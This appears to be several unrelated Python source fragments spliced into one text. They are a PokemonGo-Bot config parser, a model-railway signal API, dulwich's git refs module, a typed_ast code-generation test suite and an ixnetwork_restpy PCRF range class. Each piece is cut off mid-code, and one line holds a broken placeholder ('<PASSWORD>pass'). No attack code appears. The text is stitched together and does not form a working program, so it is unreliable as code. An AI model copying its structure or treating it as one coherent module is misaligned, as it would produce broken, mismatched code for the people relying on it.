long_flag="--reconnecting_timeout",
help="Timeout between reconnecting if error occured (in minutes, e.g. 15)",
type=float,
default=15.0
)
add_config(
parser,
load,
short_flag="-hr",
long_flag="--health_record",
help="Send anonymous bot event to GA for bot health record. Set \"health_record\":false if you need disable it.",
type=bool,
default=True
)
add_config(
parser,
load,
short_flag="-ac",
long_flag="--forts.avoid_circles",
help="Avoids circles (pokestops) of the max size set in max_circle_size flag",
type=bool,
default=False,
)
add_config(
parser,
load,
short_flag="-mcs",
long_flag="--forts.max_circle_size",
help="If avoid_circles flag is set, this flag specifies the maximum size of circles (pokestops) avoided",
type=int,
default=10,
)
add_config(
parser,
load,
long_flag="--catch_randomize_reticle_factor",
help="Randomize factor for pokeball throwing accuracy (DEFAULT 1.0 means no randomize: always 'Excellent' throw. 0.0 randomizes between normal and 'Excellent' throw)",
type=float,
default=1.0
)
add_config(
parser,
load,
long_flag="--catch_randomize_spin_factor",
help="Randomize factor for pokeball curve throwing (DEFAULT 1.0 means no randomize: always perfect 'Super Spin' curve ball. 0.0 randomizes between normal and 'Super Spin' curve ball)",
type=float,
default=1.0
)
# Start to parse other attrs
config = parser.parse_args()
if not config.username and 'username' not in load:
config.username = raw_input("Username: ")
if not config.password and 'password' not in load:
config.password = <PASSWORD>pass("Password: ")
config.catch = load.get('catch', {})
config.release = load.get('release', {})
config.item_filter = load.get('item_filter', {})
config.action_wait_max = load.get('action_wait_max', 4)
config.action_wait_min = load.get('action_wait_min', 1)
config.raw_tasks = load.get('tasks', [])
config.vips = load.get('vips',{})
if len(config.raw_tasks) == 0:
logging.error("No tasks are configured. Did you mean to configure some behaviors? Read https://github.com/PokemonGoF/PokemonGo-Bot/wiki/Configuration-files#configuring-tasks for more information")
return None
if config.auth_service not in ['ptc', 'google']:
logging.error("Invalid Auth service specified! ('ptc' or 'google')")
return None
def task_configuration_error(flag_name):
parser.error("""
\"{}\" was removed from the configuration options.
You can now change the behavior of the bot by modifying the \"tasks\" key.
Read https://github.com/PokemonGoF/PokemonGo-Bot/wiki/Configuration-files#configuring-tasks for more information.
""".format(flag_name))
old_flags = ['mode', 'catch_pokemon', 'spin_forts', 'forts_spin', 'hatch_eggs', 'release_pokemon', 'softban_fix',
'longer_eggs_first']
for flag in old_flags:
if flag in load:
task_configuration_error(flag)
return None
nested_old_flags = [('forts', 'spin'), ('forts', 'move_to_spin')]
for outer, inner in nested_old_flags:
if load.get(outer, {}).get(inner, None):
task_configuration_error('{}.{}'.format(outer, inner))
return None
if (config.evolve_captured
and (not isinstance(config.evolve_captured, str)
or str(config.evolve_captured).lower() in ["true", "false"])):
parser.error('"evolve_captured" should be list of pokemons: use "all" or "none" to match all ' +
'or none of the pokemons, or use a comma separated list such as "Pidgey,Weedle,Caterpie"')
return None
if not (config.location or config.location_cache):
parser.error("Needs either --use-location-cache or --location.")
return None
if config.catch_randomize_reticle_factor < 0 or 1 < config.catch_randomize_reticle_factor:
parser.error("--catch_randomize_reticle_factor is out of range! (should be 0 <= catch_randomize_reticle_factor <= 1)")
return None
if config.catch_randomize_spin_factor < 0 or 1 < config.catch_randomize_spin_factor:
parser.error("--catch_randomize_spin_factor is out of range! (should be 0 <= catch_randomize_spin_factor <= 1)")
return None
# item list config verification
item_list = json.load(open(os.path.join('data', 'items.json')))
for config_item_name, bag_count in config.item_filter.iteritems():
if config_item_name not in item_list.viewvalues():
if config_item_name not in item_list:
parser.error('item "' + config_item_name + '" does not exist, spelling mistake? (check for valid item names in data/items.json)')
return None
# create web dir if not exists
try:
os.makedirs(web_dir)
except OSError:
if not os.path.isdir(web_dir):
raise
if config.evolve_all and isinstance(config.evolve_all, str):
| |
the signal on the canvas (in pixels)
# Optional Parameters:
# orientation:int- Orientation in degrees (0 or 180) - Default is zero
# sig_callback:name - Function to call when a signal event happens - Default is no callback
# Note that the callback function returns (item_id, callback type)
# sig_passed_button:bool - Creates a "signal Passed" button for automatic control - Default False
# shunt_ahead:bool - Specifies a shunt ahead signal (yellow banner) - default False (red banner)
#
# set_route - Set (and change) the route indication (either feathers or theatre text)
# Mandatory Parameters:
# sig_id:int - The ID for the signal
# Optional Parameters:
# route:signals_common.route_type - MAIN, LH1, LH2, RH1 or RH2 - default 'NONE'
# theatre_text:str - The text to display in the theatre route indicator - default "NONE"
#
# update_signal - update the signal aspect based on the aspect of a signal ahead - Primarily
# intended for 3/4 aspect colour light signals but can also be used to update
# 2-aspect distant signals (semaphore or colour light) on the home signal ahead
# Mandatory Parameters:
# sig_id:int - The ID for the signal
# Optional Parameters:
# sig_ahead_id:int/str - The ID for the signal "ahead" of the one we want to update.
# Either an integer representing the ID of the signal created on our schematic,
# or a string representing the identifier of an signal on an external host/node
# (subscribed to via the MQTT Interface - refer to the section on MQTT interfacing)
# Default = "None" (no signal ahead to take into account when updating the signal)
#
# toggle_signal(sig_id) - to support route setting (use 'signal_clear' to find the switched state )
#
# toggle_subsidary(sig_id) - to support route setting (use 'subsidary_clear' to find the switched state)
#
# lock_signal(*sig_id) - for point/signal interlocking (multiple Signal_IDs can be specified)
#
# unlock_signal(*sig_id) - for point/signal interlocking (multiple Signal_IDs can be specified)
#
# lock_subsidary(*sig_id) - for point/signal interlocking (multiple Signal_IDs can be specified)
#
# unlock_subsidary(*sig_id) - for point/signal interlocking (multiple Signal_IDs can be specified)
#
# signal_clear(sig_id) - returns the SWITCHED state of the signal - i.e the state of the signal button
# (True='OFF') - use for external point/signal interlocking functions
#
# subsidary_clear(sig_id) - returns the SWITCHED state of the subsidary - i.e the state of the subsidary
# button (True='OFF') - use for external point/signal interlocking functions
#
# signal_state(sig_id) - returns the DISPLAYED state of the signal - This can be different to the SWITCHED
# state of the signal if the signal is OVERRIDDEN or subject to APPROACH CONTROL
# Use this function when you need to get the actual state (in terms of aspect)
# that the signal is displaying - returns 'signal_state_type' (see above)
#
# set_signal_override (sig_id*) - Overrides the signal to DANGER (can specify multiple sig_ids)
#
# clear_signal_override (sig_id*) - Reverts signal to the non-overridden state (can specify multiple sig_ids)
#
# signal_overridden (sig_id) - returns the signal override state (True='overridden')
# Function DEPRECATED (will be removed from future releases) - use signal_state instead
#
# trigger_timed_signal - Sets the signal to DANGER and then cycles through the aspects back to PROCEED
# - If a start delay > 0 is specified then a 'sig_passed' callback event is generated
# - when the signal is changed to DANGER - For each subsequent aspect change (all the
# - way back to PROCEED) a 'sig_updated' callback event will be generated
# Mandatory Parameters:
# sig_id:int - The ID for the signal
# Optional Parameters:
# start_delay:int - Delay (in seconds) before changing to DANGER (default=5)
# time_delay:int - Delay (in seconds) for cycling through the aspects (default=5)
#
# set_approach_control - Used when a diverging route has a lower speed restriction to the main line
# Puts the signal into "Approach Control" Mode where the signal will display a more
# restrictive aspect/state (either DANGER or CAUTION) to approaching trains. As the
# Train approaches, the signal will then be "released" to display its "normal" aspect.
# When a signal is in "approach control" mode the signals behind will display the
# appropriate aspects (when updated based on the signal ahead). These would be the
# normal aspects for "Release on Red" but for "Release on Yellow", the signals behind
# would display flashing yellow and flashing double yellow (assuming 4 aspect signals)
# Mandatory Parameters:
# sig_id:int - The ID for the signal
# Optional Parameters:
# release_on_yellow:Bool - True = Yellow Approach aspect, False = Red Approach aspect (default=False)
#
# clear_approach_control - This "releases" the signal to display the normal aspect and should be called when
# a train is approaching the signal. Note that signals can also be released when the
# "release button" (displayed just in front of the signal if specified when the signal
# was created) is activated - manually or via an external sensor event# Mandatory Parameters:
# sig_id:int - The ID for the signal
#
# approach_control_set (sig_id) - returns if the signal is subject to approach control (True='active')
# Function DEPRECATED (will be removed from future releases) - use signal_state instead
#
# -------------------------------------------------------------------------
from . import signals_common
from . import signals_colour_lights
from . import signals_ground_position
from . import signals_ground_disc
from . import signals_semaphores
from typing import Union
from tkinter import *
import logging
# -------------------------------------------------------------------------
# Externally called function to Return the current SWITCHED state of the signal
# (i.e. the state of the signal button - Used to enable interlocking functions)
# Note that the DISPLAYED state of the signal may not be CLEAR if the signal is
# overridden or subject to release on RED - See "signal_displaying_clear"
# Function applicable to ALL signal types created on the local schematic
# Function does not support REMOTE Signals (with a compound Sig-ID)
# -------------------------------------------------------------------------
def signal_clear (sig_id:int):
global logging
# Validate the signal exists
if not signals_common.sig_exists(sig_id):
logging.error ("Signal "+str(sig_id)+": signal_clear - Signal does not exist")
sig_clear = False
else:
sig_clear = signals_common.signals[str(sig_id)]["sigclear"]
return (sig_clear)
# -------------------------------------------------------------------------
# Externally called function to Return the displayed state of the signal
# (i.e. whether the signal is actually displaying a CLEAR aspect). Note that
# this can be different to the state the signal has been manually set to (via
# the signal button) - as it could be overridden or subject to Release on Red
# Function applicable to ALL signal types - Including REMOTE SIGNALS
# -------------------------------------------------------------------------
def signal_state (sig_id:Union[int,str]):
global logging
# Validate the signal exists
if not signals_common.sig_exists(sig_id):
logging.error ("Signal "+str(sig_id)+": signal_state - Signal does not exist")
sig_state = signals_common.signal_state_type.DANGER
else:
sig_state = signals_common.signals[str(sig_id)]["sigstate"]
return (sig_state)
# -------------------------------------------------------------------------
# ##### DEPRECATED ##### DEPRECATED ##### DEPRECATED ##### DEPRECATED #####
# Externally called function to Return the current state of the signal overide
# Function applicable to ALL signal types created on the local schematic
# Function does not support REMOTE Signals (with a compound Sig-ID)
# -------------------------------------------------------------------------
def signal_overridden (sig_id:int):
global logging
# Validate the signal exists
logging.warning ("Signal "+str(sig_id)+": signal_overridden - This function is DEPRECATED")
if not signals_common.sig_exists(sig_id):
logging.error ("Signal "+str(sig_id)+": signal_overridden - Signal does not exist")
sig_overridden = False
else:
sig_overridden = signals_common.signals[str(sig_id)]["override"]
return (sig_overridden)
# -------------------------------------------------------------------------
# ##### DEPRECATED ##### DEPRECATED ##### DEPRECATED ##### DEPRECATED #####
# Externally called function to Return the current state of the approach control
# Function applicable to ALL signal types created on the local schematic
# (will return False if the particular signal type not supported)
# Function does not support REMOTE Signals (with a compound Sig-ID)
# -------------------------------------------------------------------------
def approach_control_set (sig_id:int):
global logging
logging.warning ("Signal "+str(sig_id)+": approach_control_set - This function is DEPRECATED")
# Validate the signal exists
if not signals_common.sig_exists(sig_id):
logging.error ("Signal "+str(sig_id)+": approach_control_set - Signal does not exist")
approach_control_active = False
# get the signal state to return - only supported for semaphores and colour_lights
elif (signals_common.signals[str(sig_id)]["sigtype"] in
(signals_common.sig_type.colour_light, signals_common.sig_type.semaphore)):
approach_control_active = (signals_common.signals[str(sig_id)]["releaseonred"]
or signals_common.signals[str(sig_id)]["releaseonyel"])
else:
approach_control_active = False
return (approach_control_active)
# -------------------------------------------------------------------------
# Externally called function to Return the current state of the subsidary
# signal - if the signal does not have one then the return will be FALSE
# Function applicable to ALL signal types created on the local schematic
# Function does not support REMOTE Signals (with a compound Sig-ID)
# -------------------------------------------------------------------------
def subsidary_clear (sig_id:int):
global logging
# Validate the signal exists
| |
<gh_stars>0
# refs.py -- For dealing with git refs
# Copyright (C) 2008-2013 <NAME> <<EMAIL>>
#
# Dulwich is dual-licensed under the Apache License, Version 2.0 and the GNU
# General Public License as public by the Free Software Foundation; version 2.0
# or (at your option) any later version. You can redistribute it and/or
# modify it under the terms of either of these two licenses.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# You should have received a copy of the licenses; if not, see
# <http://www.gnu.org/licenses/> for a copy of the GNU General Public License
# and <http://www.apache.org/licenses/LICENSE-2.0> for a copy of the Apache
# License, Version 2.0.
#
"""Ref handling.
"""
import errno
import os
import sys
from dulwich.errors import (
PackedRefsException,
RefFormatError,
)
from dulwich.objects import (
git_line,
valid_hexsha,
ZERO_SHA,
)
from dulwich.file import (
GitFile,
ensure_dir_exists,
)
SYMREF = b'ref: '
LOCAL_BRANCH_PREFIX = b'refs/heads/'
BAD_REF_CHARS = set(b'\177 ~^:?*[')
ANNOTATED_TAG_SUFFIX = b'^{}'
def parse_symref_value(contents):
"""Parse a symref value.
:param contents: Contents to parse
:return: Destination
"""
if contents.startswith(SYMREF):
return contents[len(SYMREF):].rstrip(b'\r\n')
raise ValueError(contents)
def check_ref_format(refname):
"""Check if a refname is correctly formatted.
Implements all the same rules as git-check-ref-format[1].
[1]
http://www.kernel.org/pub/software/scm/git/docs/git-check-ref-format.html
:param refname: The refname to check
:return: True if refname is valid, False otherwise
"""
# These could be combined into one big expression, but are listed
# separately to parallel [1].
if b'/.' in refname or refname.startswith(b'.'):
return False
if b'/' not in refname:
return False
if b'..' in refname:
return False
for i, c in enumerate(refname):
if ord(refname[i:i+1]) < 0o40 or c in BAD_REF_CHARS:
return False
if refname[-1] in b'/.':
return False
if refname.endswith(b'.lock'):
return False
if b'@{' in refname:
return False
if b'\\' in refname:
return False
return True
class RefsContainer(object):
"""A container for refs."""
def set_symbolic_ref(self, name, other):
"""Make a ref point at another ref.
:param name: Name of the ref to set
:param other: Name of the ref to point at
"""
raise NotImplementedError(self.set_symbolic_ref)
def get_packed_refs(self):
"""Get contents of the packed-refs file.
:return: Dictionary mapping ref names to SHA1s
:note: Will return an empty dictionary when no packed-refs file is
present.
"""
raise NotImplementedError(self.get_packed_refs)
def get_peeled(self, name):
"""Return the cached peeled value of a ref, if available.
:param name: Name of the ref to peel
:return: The peeled value of the ref. If the ref is known not point to
a tag, this will be the SHA the ref refers to. If the ref may point
to a tag, but no cached information is available, None is returned.
"""
return None
def import_refs(self, base, other):
for name, value in other.items():
self[b'/'.join((base, name))] = value
def allkeys(self):
"""All refs present in this container."""
raise NotImplementedError(self.allkeys)
def keys(self, base=None):
"""Refs present in this container.
:param base: An optional base to return refs under.
:return: An unsorted set of valid refs in this container, including
packed refs.
"""
if base is not None:
return self.subkeys(base)
else:
return self.allkeys()
def subkeys(self, base):
"""Refs present in this container under a base.
:param base: The base to return refs under.
:return: A set of valid refs in this container under the base; the base
prefix is stripped from the ref names returned.
"""
keys = set()
base_len = len(base) + 1
for refname in self.allkeys():
if refname.startswith(base):
keys.add(refname[base_len:])
return keys
def as_dict(self, base=None):
"""Return the contents of this container as a dictionary.
"""
ret = {}
keys = self.keys(base)
if base is None:
base = b''
else:
base = base.rstrip(b'/')
for key in keys:
try:
ret[key] = self[(base + b'/' + key).strip(b'/')]
except KeyError:
continue # Unable to resolve
return ret
def _check_refname(self, name):
"""Ensure a refname is valid and lives in refs or is HEAD.
HEAD is not a valid refname according to git-check-ref-format, but this
class needs to be able to touch HEAD. Also, check_ref_format expects
refnames without the leading 'refs/', but this class requires that
so it cannot touch anything outside the refs dir (or HEAD).
:param name: The name of the reference.
:raises KeyError: if a refname is not HEAD or is otherwise not valid.
"""
if name in (b'HEAD', b'refs/stash'):
return
if not name.startswith(b'refs/') or not check_ref_format(name[5:]):
raise RefFormatError(name)
def read_ref(self, refname):
"""Read a reference without following any references.
:param refname: The name of the reference
:return: The contents of the ref file, or None if it does
not exist.
"""
contents = self.read_loose_ref(refname)
if not contents:
contents = self.get_packed_refs().get(refname, None)
return contents
def read_loose_ref(self, name):
"""Read a loose reference and return its contents.
:param name: the refname to read
:return: The contents of the ref file, or None if it does
not exist.
"""
raise NotImplementedError(self.read_loose_ref)
def follow(self, name):
"""Follow a reference name.
:return: a tuple of (refnames, sha), wheres refnames are the names of
references in the chain
"""
contents = SYMREF + name
depth = 0
refnames = []
while contents.startswith(SYMREF):
refname = contents[len(SYMREF):]
refnames.append(refname)
contents = self.read_ref(refname)
if not contents:
break
depth += 1
if depth > 5:
raise KeyError(name)
return refnames, contents
def _follow(self, name):
import warnings
warnings.warn(
"RefsContainer._follow is deprecated. Use RefsContainer.follow "
"instead.", DeprecationWarning)
refnames, contents = self.follow(name)
if not refnames:
return (None, contents)
return (refnames[-1], contents)
def __contains__(self, refname):
if self.read_ref(refname):
return True
return False
def __getitem__(self, name):
"""Get the SHA1 for a reference name.
This method follows all symbolic references.
"""
_, sha = self.follow(name)
if sha is None:
raise KeyError(name)
return sha
def set_if_equals(self, name, old_ref, new_ref):
"""Set a refname to new_ref only if it currently equals old_ref.
This method follows all symbolic references if applicable for the
subclass, and can be used to perform an atomic compare-and-swap
operation.
:param name: The refname to set.
:param old_ref: The old sha the refname must refer to, or None to set
unconditionally.
:param new_ref: The new sha the refname will refer to.
:return: True if the set was successful, False otherwise.
"""
raise NotImplementedError(self.set_if_equals)
def add_if_new(self, name, ref):
"""Add a new reference only if it does not already exist."""
raise NotImplementedError(self.add_if_new)
def __setitem__(self, name, ref):
"""Set a reference name to point to the given SHA1.
This method follows all symbolic references if applicable for the
subclass.
:note: This method unconditionally overwrites the contents of a
reference. To update atomically only if the reference has not
changed, use set_if_equals().
:param name: The refname to set.
:param ref: The new sha the refname will refer to.
"""
self.set_if_equals(name, None, ref)
def remove_if_equals(self, name, old_ref):
"""Remove a refname only if it currently equals old_ref.
This method does not follow symbolic references, even if applicable for
the subclass. It can be used to perform an atomic compare-and-delete
operation.
:param name: The refname to delete.
:param old_ref: The old sha the refname must refer to, or None to
delete unconditionally.
:return: True if the delete was successful, False otherwise.
"""
raise NotImplementedError(self.remove_if_equals)
def __delitem__(self, name):
"""Remove a refname.
This method does not follow symbolic references, even if applicable for
the subclass.
:note: This method unconditionally deletes the contents of a reference.
To delete atomically only if the reference has not changed, use
remove_if_equals().
:param name: The refname to delete.
"""
self.remove_if_equals(name, None)
def get_symrefs(self):
"""Get a dict with all symrefs in this container.
:return: Dictionary mapping source ref to target ref
"""
ret = {}
for src in self.allkeys():
try:
dst = parse_symref_value(self.read_ref(src))
except ValueError:
pass
else:
ret[src] = dst
return ret
class DictRefsContainer(RefsContainer):
"""RefsContainer backed by a simple dict.
This container does not support symbolic or packed references and is not
threadsafe.
"""
def __init__(self, refs):
self._refs = refs
self._peeled = {}
def allkeys(self):
return self._refs.keys()
def read_loose_ref(self, name):
return self._refs.get(name, None)
def get_packed_refs(self):
return {}
def set_symbolic_ref(self, name, other):
self._refs[name] = SYMREF + other
| |
# -*- coding: utf-8 -*-
import unittest
from typed_ast import ast27
class TestCodeGen27(unittest.TestCase):
def setUp(self):
from gen27 import CodeGen27
self.gen = CodeGen27()
def regen(s):
return self.gen.generate(ast27.parse(s), 0)
self.regen = regen
def test_module_docstring(self):
cases = [
'',
'"""doc string"""',
'''"""
doc string
"""''',
'b"""a"""',
'u"""あ"""',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_assert(self):
cases = [
'assert True',
"assert True, 'assert true'",
"""def f():
assert False, 'テスト'"""
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_assign(self):
cases = [
'a = 1',
'a = b = 1',
'a = 2 # type: int',
'a = b = 2 # type: int',
"""def f():
a = 1""",
'a, b = l',
'a, (b, c) = l',
'[a] = b = l',
'[a, (b, [c, (d,)])] = l',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_break_continue(self):
cases = [
"""for i in l:
break""",
"""for i in l:
continue""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_aug_assign(self):
cases = [
'b += 1',
'b -= 1',
'b *= 1',
'b /= 1',
'b //= 1',
'b %= 1',
'b **= 1',
'b >>= 1',
'b <<= 1',
'b &= 1',
'b ^= 1',
'b |= 1',
"""def f():
a += 1""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_class_def(self):
cases = [
"""class A:
pass""",
"""class A(object):
a = 1""",
"""@deco
class A(B, C):
@deco_out
@deco_iin
class D:
def f(self):
pass""",
'''class A:
"""
doc string
"""''',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_delete(self):
cases = [
'del a',
'del a, b',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_exec(self):
cases = [
"exec '1'",
"exec 'a = 1' in globals()",
"exec 'a = 1' in globals(), locals()",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_for(self):
cases = [
"""for i in l:
pass""",
"""for i, j in l:
pass""",
"""for i, (j, k) in l:
pass""",
"""for i in l: # type: int
for j in ll: # type: long
pass""",
"""for i in l:
a += i
else:
pass""",
"""for i in l:
for j in ll:
a += j
else:
a += i
else:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_function_def(self):
cases = [
"""def f():
pass""",
"""def f(a):
pass""",
"""def f(a, b):
pass""",
"""def f(a=1):
pass""",
"""def f(a=1, b=2):
pass""",
"""def f(a, b, c=1, d=2):
pass""",
"""def f(*args):
pass""",
"""def f(a, *args):
pass""",
"""def f(a=1, *args):
pass""",
"""def f(a, b, c=1, d=2, *args):
pass""",
"""def f(**kw):
pass""",
"""def f(a, **kw):
pass""",
"""def f(a=1, **kw):
pass""",
"""def f(a, b, c=1, d=2, **kw):
pass""",
"""def f(*args, **kw):
pass""",
"""def f(a, *args, **kw):
pass""",
"""def f(a=1, *args, **kw):
pass""",
"""def f(a, b, c=1, d=2, *args, **kw):
pass""",
"""def f(): # type: () -> int
return 1""",
"""def f(
a, # type: int
b,
c, # type: float
*d # type: list
): # type: None
pass""",
"""@deco
def f():
pass""",
"""@outer
@inner(a, b=1)
def f():
pass""",
'''def f():
"""abc"""
a = b = c = 1''',
'''def f():
"""
a
b
c
"""
pass''',
"""def f():
def g():
def h():
pass"""
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_global(self):
cases = [
"""def f():
global a
a = 1""",
"""def f():
global a, b, c
a = b = c = 1"""
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_if(self):
cases = [
"""if a:
pass""",
"""if a:
a = 1
else:
pass""",
"""if a:
a = 1
elif b:
pass""",
"""if a:
a = 1
elif b:
b = 1
else:
pass""",
"""if a:
if b:
if c:
c = 1
elif d:
d = 1
elif e:
e = 1""",
"""def f():
if a:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_import(self):
cases = [
'import a',
'import a.b',
'import a as aa',
'import a.b as aa',
'import a, b',
'import a as aa, b',
'import a as aa, b as bb',
'from a import b',
'from a import b, c',
'from a import b as bb',
'from a import b as bb, c',
'from a import b, c',
'from . import b',
'from .a import b',
'from a.b import c',
'from ....a import b',
'from ....a import b',
'from ..a.b.c import d',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_print(self):
cases = [
'print',
'print a',
'print a,',
'print a, b',
'print>>sys.stderr, a',
'print>>sys.stderr, a,',
'print>>sys.stderr, a, b',
"""def f():
print""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_raise(self):
cases = [
'raise',
'raise TypeError',
'raise Exception(a)',
'raise Exception, a',
'raise Exception, a, tb',
"""def f():
raise ValueError""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_return(self):
cases = [
"""def f():
return""",
"""def f():
return a""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_try(self):
cases = [
"""try:
a = 1
except:
b = 2""",
"""try:
pass
except ValueError:
pass""",
"""try:
pass
except ValueError as e:
pass""",
"""try:
pass
except (ValueError, TypeError) as e:
pass""",
"""try:
pass
except ValueError:
pass
except TypeError:
pass""",
"""try:
pass
finally:
pass""",
"""try:
pass
except Exception:
pass
finally:
pass""",
"""try:
try:
a = 1
except:
b = 2
finally:
c = 3
except:
pass
finally:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_while(self):
cases = [
"""while True:
pass""",
"""while True:
break
else:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_with(self):
cases = [
"""with aa:
pass""",
"""with open('a.txt') as f:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
neq_cases = [
(
"""with aa as a, bb as b:
pass""",
"""with aa as a:
with bb as b:
pass"""),
]
for origin, exact in neq_cases:
self.assertEqual(exact, self.regen(origin))
def test_call(self):
cases = [
'f()',
'f(1)',
'f(1, 2)',
'f(1, 2, 3)',
'f(a=1)',
'f(a=1, b=2)',
'f(*l)',
'f(**k)',
'f(1, 2, a=1, b=2)',
'f(1, a=2, *l, **k)',
'(f + h)()',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_compare(self):
cases = [
'1 < 2 > 3 == 4 != 5',
'a <= b >= c',
'a is None',
'a is not None',
'a in l not in ll',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_dict(self):
cases = [
'{}',
'{1: 10}',
"""{
1: 10,
2: 20,
}""",
"""def f():
a = {
b: c,
d: e,
}""",
'{i: i * i for i in a}',
'{i: i * i for i in a if i}',
'{i: i * i for i in a if i if i < 10}',
'{i: i * j for i in a if i if i < 10 for j in b if j * 10}',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_generator_exp(self):
cases = [
'(i * j for i in l)',
'(i * j for i in l if i > 10)',
'(i * j for i in l for j in ll)',
'(i * j for i in l if i < 2 for j in ll if j if j < 10)',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_lambda(self):
cases = [
'lambda: 1',
'lambda x: x + 1',
'lambda x, y: x * y',
'lambda x, y=1: x / y',
'lambda x, y=1, *z: x / y + sum(z)',
'lambda x: lambda y: x ^ y',
'(lambda x: x) + f',
'f | (lambda x: x)',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_list(self):
cases = [
'[]',
'[1]',
"""[
1,
2,
]""",
'[a, b, c] = l',
'[i for i in l]',
'[i * j for i in l if i for j in ll if j]',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_repr(self):
cases = [
'`1`',
'`1 + 2`',
"`1 + 2` + '3'",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_set(self):
cases = [
'{1}',
'{1, 2, 3}',
"""def f():
a = {
1,
2,
3,
4,
}""",
'{i ** 2 for i in a}',
'{i ** 2 for i in a if i < 10}',
'{i ** 2 for i | |
<filename>ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/egtppcrfs5s8range_d7b3bdabbe4bfdf7e1a28233c37db008.py
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class EgtpPcrfS5S8Range(Base):
"""PCRF Range
The EgtpPcrfS5S8Range class encapsulates a required egtpPcrfS5S8Range resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'egtpPcrfS5S8Range'
_SDM_ATT_MAP = {
'Apn': 'apn',
'Apn_AMBRD': 'apn_AMBRD',
'Apn_AMBRU': 'apn_AMBRU',
'Db_gbrd': 'db_gbrd',
'Db_gbru': 'db_gbru',
'Db_mbrd': 'db_mbrd',
'Db_mbru': 'db_mbru',
'Db_pci': 'db_pci',
'Db_pl': 'db_pl',
'Db_pvi': 'db_pvi',
'Db_qci': 'db_qci',
'DefaultBearerLifetimeTimer': 'defaultBearerLifetimeTimer',
'EnableDefaultBearerLifetime': 'enableDefaultBearerLifetime',
'EnableNIDBCreationDelay': 'enableNIDBCreationDelay',
'Enabled': 'enabled',
'IMSI': 'iMSI',
'Ims_apn': 'ims_apn',
'IpType': 'ipType',
'Name': 'name',
'NidbCreationDelay': 'nidbCreationDelay',
'ObjectId': 'objectId',
'ParentPgw': 'parentPgw',
'PoolSize': 'poolSize',
'PoolStartIPv4': 'poolStartIPv4',
'PoolStartIPv6': 'poolStartIPv6',
'PoolStartIp': 'poolStartIp',
'RoundRobinDistribution': 'roundRobinDistribution',
'TotalCount': 'totalCount',
'UserPlaneIPv4Address': 'userPlaneIPv4Address',
'UserPlaneIPv6Address': 'userPlaneIPv6Address',
'UserPlaneIpAddress': 'userPlaneIpAddress',
'UserPlaneIpCount': 'userPlaneIpCount',
}
def __init__(self, parent):
super(EgtpPcrfS5S8Range, self).__init__(parent)
@property
def DedicatedBearersS5S8Pgw(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocolstack.dedicatedbearerss5s8pgw_895ed4fe0bf5aa63ce27cad2c79291aa.DedicatedBearersS5S8Pgw): An instance of the DedicatedBearersS5S8Pgw class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocolstack.dedicatedbearerss5s8pgw_895ed4fe0bf5aa63ce27cad2c79291aa import DedicatedBearersS5S8Pgw
return DedicatedBearersS5S8Pgw(self)
@property
def TrafficProfileProxiesS5S8Pgw(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocolstack.trafficprofileproxiess5s8pgw_e4ed9c77e8660dfdebbdb4de3e72c6c6.TrafficProfileProxiesS5S8Pgw): An instance of the TrafficProfileProxiesS5S8Pgw class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
